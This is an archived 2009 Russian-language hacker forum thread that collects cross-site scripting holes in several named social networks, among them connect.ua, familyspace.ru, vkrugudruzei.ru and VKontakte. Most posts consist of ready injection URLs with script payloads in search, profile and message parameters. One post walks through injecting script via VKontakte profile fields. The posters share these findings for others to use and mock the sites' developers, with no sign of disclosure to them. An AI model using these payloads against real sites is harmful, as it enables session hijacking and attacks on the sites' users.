PDA

Просмотр полной версии : Уязвимости в соц. сетях

.:EnoT:.
20.01.2009, 07:14
По многочисленным просьбам пользователей и одного из модераторов раздела Уязвимостей создана данная тема.

Теперь все уязвимости постим в этой теме. Отдельно созданные темы будут удаляться!
Shadow_p1raT
20.01.2009, 08:21
Буду пейвым

connect.ua

ХSS в панели Фотография


http://connect.ua/v2/profile?edit&photo&error=[XSS]


XSS в Поиске


http://connect.ua/v2/search?users=&q=">[XSS]


Ну и на десерт XSS в Личных сообщениях,поле Тема
Текст темы:


</title>[XSS]


А вообще ксс там повсюду.Интересно какую тарву курили разработчики:)
Shadow_p1raT
20.01.2009, 14:56
Familyspace.ru

XSS в Поиске


http://www.familyspace.ru/index.php?page=search&pn=1&first_nam=">[XSS]


XSS при просмотре профиля

http://www.familyspace.ru/index.php?page=profile&user_id=[тут id пользователя][XSS]


Пример

http://www.familyspace.ru/index.php?page=profile&user_id=75212<script>alert()</script>


А тут сходу 2 XSS уязвимая переменная message и from_page


http://www.familyspace.ru/index.php?page=edit_profile&message=">[XSS]&from_page=">[XSS]


Пример:

http://www.familyspace.ru/index.php?page=edit_profile&message="><script>alert(1)</script>&from_page="><script>alert(2)</script>

Наверно разработчики предыдущего проекта поделились травой с этими:)
s0l_ir0n
21.03.2009, 03:54
http://majormo.ru
XSS в статусе. (выставляется через настройки профайла)
Failure
27.03.2009, 04:34
http://vkrugudruzei.ru/support/forget.asp?forgetemail=%22%3E%3Cscript%3Ealert(%27 xss%27);%3C/script%3E
только что нашел, что соц. сеть, что хсс :)
JOHNik
05.06.2009, 00:01
:( все прикрыли тока что! быстро ребята работают!
для тех кто не вкурил рядом с вкладкой "Личная информация" есть ссылка "[редактировать]"
Пишем в форму (кроме форм "Любимые цитаты:" и "О себе:" ) например "Любимые фильмы:" [XSS] потом сохраняем
Появляется ссылка если по ней перейти наша [XSS] оказывается тут:
<script type="text/javascript">
qCur = 4;
ge('qinput').value='[XXS]';
ge('qinput').focus();
ge('qdrop').innerHTML = qArr[qCur][1];
sOn = 1;
newSearch = 1;
function globalSearch() {
var force = setCriteria(qArr[qCur][3], ge('qinput').value);
updateResults(force);
hide('qfriends');
qfCur = -1;
// ge('qinput').blur();
}
</script>
ну сами видите где! (сейчас админы вконтакте подредактировали этот блок, старого у меня не осталось) там то она и работала.
Я тут новичок, так что если че не так пишите в личку, буду рад =)))